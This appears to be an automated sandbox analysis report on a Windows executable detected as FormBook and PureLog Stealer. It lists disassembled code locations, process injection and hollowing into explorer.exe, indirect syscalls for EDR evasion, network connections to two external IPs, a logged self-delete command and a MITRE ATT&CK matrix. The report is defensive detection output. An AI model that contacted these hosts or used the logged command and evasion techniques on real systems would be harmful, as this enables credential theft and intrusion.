                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010329A0 mov eax, dword ptr fs:[00000030h]11_2_010329A0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010209AD mov eax, dword ptr fs:[00000030h]11_2_010209AD
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010209AD mov eax, dword ptr fs:[00000030h]11_2_010209AD
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A89B3 mov esi, dword ptr fs:[00000030h]11_2_010A89B3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A89B3 mov eax, dword ptr fs:[00000030h]11_2_010A89B3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010A89B3 mov eax, dword ptr fs:[00000030h]11_2_010A89B3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B69C0 mov eax, dword ptr fs:[00000030h]11_2_010B69C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102A9D0 mov eax, dword ptr fs:[00000030h]11_2_0102A9D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102A9D0 mov eax, dword ptr fs:[00000030h]11_2_0102A9D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102A9D0 mov eax, dword ptr fs:[00000030h]11_2_0102A9D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102A9D0 mov eax, dword ptr fs:[00000030h]11_2_0102A9D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102A9D0 mov eax, dword ptr fs:[00000030h]11_2_0102A9D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102A9D0 mov eax, dword ptr fs:[00000030h]11_2_0102A9D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010549D0 mov eax, dword ptr fs:[00000030h]11_2_010549D0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010EA9D3 mov eax, dword ptr fs:[00000030h]11_2_010EA9D3
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010AE9E0 mov eax, dword ptr fs:[00000030h]11_2_010AE9E0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010529F9 mov eax, dword ptr fs:[00000030h]11_2_010529F9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010529F9 mov eax, dword ptr fs:[00000030h]11_2_010529F9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010AC810 mov eax, dword ptr fs:[00000030h]11_2_010AC810
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01042835 mov eax, dword ptr fs:[00000030h]11_2_01042835
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01042835 mov eax, dword ptr fs:[00000030h]11_2_01042835
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01042835 mov eax, dword ptr fs:[00000030h]11_2_01042835
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01042835 mov ecx, dword ptr fs:[00000030h]11_2_01042835
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01042835 mov eax, dword ptr fs:[00000030h]11_2_01042835
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01042835 mov eax, dword ptr fs:[00000030h]11_2_01042835
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105A830 mov eax, dword ptr fs:[00000030h]11_2_0105A830
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C483A mov eax, dword ptr fs:[00000030h]11_2_010C483A
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C483A mov eax, dword ptr fs:[00000030h]11_2_010C483A
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01032840 mov ecx, dword ptr fs:[00000030h]11_2_01032840
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01050854 mov eax, dword ptr fs:[00000030h]11_2_01050854
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01024859 mov eax, dword ptr fs:[00000030h]11_2_01024859
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01024859 mov eax, dword ptr fs:[00000030h]11_2_01024859
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010AE872 mov eax, dword ptr fs:[00000030h]11_2_010AE872
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010AE872 mov eax, dword ptr fs:[00000030h]11_2_010AE872
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B6870 mov eax, dword ptr fs:[00000030h]11_2_010B6870
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B6870 mov eax, dword ptr fs:[00000030h]11_2_010B6870
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01020887 mov eax, dword ptr fs:[00000030h]11_2_01020887
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010AC89D mov eax, dword ptr fs:[00000030h]11_2_010AC89D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104E8C0 mov eax, dword ptr fs:[00000030h]11_2_0104E8C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F08C0 mov eax, dword ptr fs:[00000030h]11_2_010F08C0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010EA8E4 mov eax, dword ptr fs:[00000030h]11_2_010EA8E4
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105C8F9 mov eax, dword ptr fs:[00000030h]11_2_0105C8F9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105C8F9 mov eax, dword ptr fs:[00000030h]11_2_0105C8F9
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F4B00 mov eax, dword ptr fs:[00000030h]11_2_010F4B00
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109EB1D mov eax, dword ptr fs:[00000030h]11_2_0109EB1D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109EB1D mov eax, dword ptr fs:[00000030h]11_2_0109EB1D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109EB1D mov eax, dword ptr fs:[00000030h]11_2_0109EB1D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109EB1D mov eax, dword ptr fs:[00000030h]11_2_0109EB1D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109EB1D mov eax, dword ptr fs:[00000030h]11_2_0109EB1D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109EB1D mov eax, dword ptr fs:[00000030h]11_2_0109EB1D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109EB1D mov eax, dword ptr fs:[00000030h]11_2_0109EB1D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109EB1D mov eax, dword ptr fs:[00000030h]11_2_0109EB1D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109EB1D mov eax, dword ptr fs:[00000030h]11_2_0109EB1D
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104EB20 mov eax, dword ptr fs:[00000030h]11_2_0104EB20
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104EB20 mov eax, dword ptr fs:[00000030h]11_2_0104EB20
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010E8B28 mov eax, dword ptr fs:[00000030h]11_2_010E8B28
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010E8B28 mov eax, dword ptr fs:[00000030h]11_2_010E8B28
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010D4B4B mov eax, dword ptr fs:[00000030h]11_2_010D4B4B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010D4B4B mov eax, dword ptr fs:[00000030h]11_2_010D4B4B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B6B40 mov eax, dword ptr fs:[00000030h]11_2_010B6B40
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010B6B40 mov eax, dword ptr fs:[00000030h]11_2_010B6B40
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010EAB40 mov eax, dword ptr fs:[00000030h]11_2_010EAB40
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010C8B42 mov eax, dword ptr fs:[00000030h]11_2_010C8B42
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01018B50 mov eax, dword ptr fs:[00000030h]11_2_01018B50
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F2B57 mov eax, dword ptr fs:[00000030h]11_2_010F2B57
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F2B57 mov eax, dword ptr fs:[00000030h]11_2_010F2B57
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F2B57 mov eax, dword ptr fs:[00000030h]11_2_010F2B57
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F2B57 mov eax, dword ptr fs:[00000030h]11_2_010F2B57
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CEB50 mov eax, dword ptr fs:[00000030h]11_2_010CEB50
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0101CB7E mov eax, dword ptr fs:[00000030h]11_2_0101CB7E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030BBE mov eax, dword ptr fs:[00000030h]11_2_01030BBE
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030BBE mov eax, dword ptr fs:[00000030h]11_2_01030BBE
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010D4BB0 mov eax, dword ptr fs:[00000030h]11_2_010D4BB0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010D4BB0 mov eax, dword ptr fs:[00000030h]11_2_010D4BB0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01040BCB mov eax, dword ptr fs:[00000030h]11_2_01040BCB
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01040BCB mov eax, dword ptr fs:[00000030h]11_2_01040BCB
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01040BCB mov eax, dword ptr fs:[00000030h]11_2_01040BCB
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01020BCD mov eax, dword ptr fs:[00000030h]11_2_01020BCD
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01020BCD mov eax, dword ptr fs:[00000030h]11_2_01020BCD
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01020BCD mov eax, dword ptr fs:[00000030h]11_2_01020BCD
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CEBD0 mov eax, dword ptr fs:[00000030h]11_2_010CEBD0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01028BF0 mov eax, dword ptr fs:[00000030h]11_2_01028BF0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01028BF0 mov eax, dword ptr fs:[00000030h]11_2_01028BF0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01028BF0 mov eax, dword ptr fs:[00000030h]11_2_01028BF0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104EBFC mov eax, dword ptr fs:[00000030h]11_2_0104EBFC
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010ACBF0 mov eax, dword ptr fs:[00000030h]11_2_010ACBF0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010ACA11 mov eax, dword ptr fs:[00000030h]11_2_010ACA11
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105CA24 mov eax, dword ptr fs:[00000030h]11_2_0105CA24
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0104EA2E mov eax, dword ptr fs:[00000030h]11_2_0104EA2E
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01044A35 mov eax, dword ptr fs:[00000030h]11_2_01044A35
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01044A35 mov eax, dword ptr fs:[00000030h]11_2_01044A35
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105CA38 mov eax, dword ptr fs:[00000030h]11_2_0105CA38
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01026A50 mov eax, dword ptr fs:[00000030h]11_2_01026A50
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01026A50 mov eax, dword ptr fs:[00000030h]11_2_01026A50
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01026A50 mov eax, dword ptr fs:[00000030h]11_2_01026A50
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01026A50 mov eax, dword ptr fs:[00000030h]11_2_01026A50
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01026A50 mov eax, dword ptr fs:[00000030h]11_2_01026A50
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01026A50 mov eax, dword ptr fs:[00000030h]11_2_01026A50
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01026A50 mov eax, dword ptr fs:[00000030h]11_2_01026A50
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030A5B mov eax, dword ptr fs:[00000030h]11_2_01030A5B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01030A5B mov eax, dword ptr fs:[00000030h]11_2_01030A5B
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105CA6F mov eax, dword ptr fs:[00000030h]11_2_0105CA6F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105CA6F mov eax, dword ptr fs:[00000030h]11_2_0105CA6F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0105CA6F mov eax, dword ptr fs:[00000030h]11_2_0105CA6F
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010CEA60 mov eax, dword ptr fs:[00000030h]11_2_010CEA60
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109CA72 mov eax, dword ptr fs:[00000030h]11_2_0109CA72
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0109CA72 mov eax, dword ptr fs:[00000030h]11_2_0109CA72
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102EA80 mov eax, dword ptr fs:[00000030h]11_2_0102EA80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102EA80 mov eax, dword ptr fs:[00000030h]11_2_0102EA80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102EA80 mov eax, dword ptr fs:[00000030h]11_2_0102EA80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102EA80 mov eax, dword ptr fs:[00000030h]11_2_0102EA80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102EA80 mov eax, dword ptr fs:[00000030h]11_2_0102EA80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102EA80 mov eax, dword ptr fs:[00000030h]11_2_0102EA80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102EA80 mov eax, dword ptr fs:[00000030h]11_2_0102EA80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102EA80 mov eax, dword ptr fs:[00000030h]11_2_0102EA80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_0102EA80 mov eax, dword ptr fs:[00000030h]11_2_0102EA80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_010F4A80 mov eax, dword ptr fs:[00000030h]11_2_010F4A80
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeCode function: 11_2_01058A90 mov edx, dword ptr fs:[00000030h]11_2_01058A90
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00335649 GetCurrentProcessId,OpenProcess,LoadLibraryExA,GetProcAddress,GetProcessHeap,GetLastError,FreeLibrary,GetLastError,OpenEventW,SetEvent,CloseHandle,GetLastError,GetLastError,14_2_00335649
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_00337020 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00337020
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_003371B0 SetUnhandledExceptionFilter,14_2_003371B0
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                System process connects to network (likely due to code injection or exploit)
                Source: C:\Windows\explorer.exeNetwork Connect: 172.96.187.60 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80Jump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeNtClose: Indirect: 0xFAA56C
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeNtQueueApcThread: Indirect: 0xFAA4F2Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeMemory written: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread register set: target process: 4056Jump to behavior
                Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 4056Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
                Sample uses process hollowing technique
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 330000Jump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeProcess created: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe "C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe"Jump to behavior
                Source: explorer.exe, 0000000C.00000003.3078129263.000000000901E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271650261.0000000009013000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3733966936.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 0000000C.00000002.3733966936.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1304822088.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 0000000C.00000002.3733966936.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1304822088.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: explorer.exe, 0000000C.00000002.3720362421.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1300394418.0000000000C59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
                Source: explorer.exe, 0000000C.00000002.3733966936.0000000001440000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1304822088.0000000001440000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: GetLocaleInfoW,CmAtolW,GetNumberFormatW,lstrlenW,CmIsDigitW,14_2_003361CA
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeQueries volume information: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 14_2_003373D5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,14_2_003373D5
                Source: C:\Users\user\Desktop\xU0wdBC6XWRZ6UY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 3.2.xU0wdBC6XWRZ6UY.exe.7ca0000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.xU0wdBC6XWRZ6UY.exe.34110fc.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.xU0wdBC6XWRZ6UY.exe.7ca0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.xU0wdBC6XWRZ6UY.exe.34110fc.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1306814449.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1297010966.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.xU0wdBC6XWRZ6UY.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.3716442630.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1297563213.00000000043E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3725258436.00000000047D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.1362555001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.3725431559.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Yara detected PureLog Stealer
                Source: Yara matchFile source: 3.2.xU0wdBC6XWRZ6UY.exe.7ca0000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.xU0wdBC6XWRZ6UY.exe.34110fc.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.xU0wdBC6XWRZ6UY.exe.7ca0000.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 3.2.xU0wdBC6XWRZ6UY.exe.34110fc.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.1306814449.0000000007CA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.1297010966.00000000033E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                Command and Scripting Interpreter                		1
                DLL Side-Loading                		612
                Process Injection                		1
                Masquerading                		OS Credential Dumping1
                System Time Discovery                		Remote Services11
                Archive Collected Data                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Shared Modules                		Boot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory231
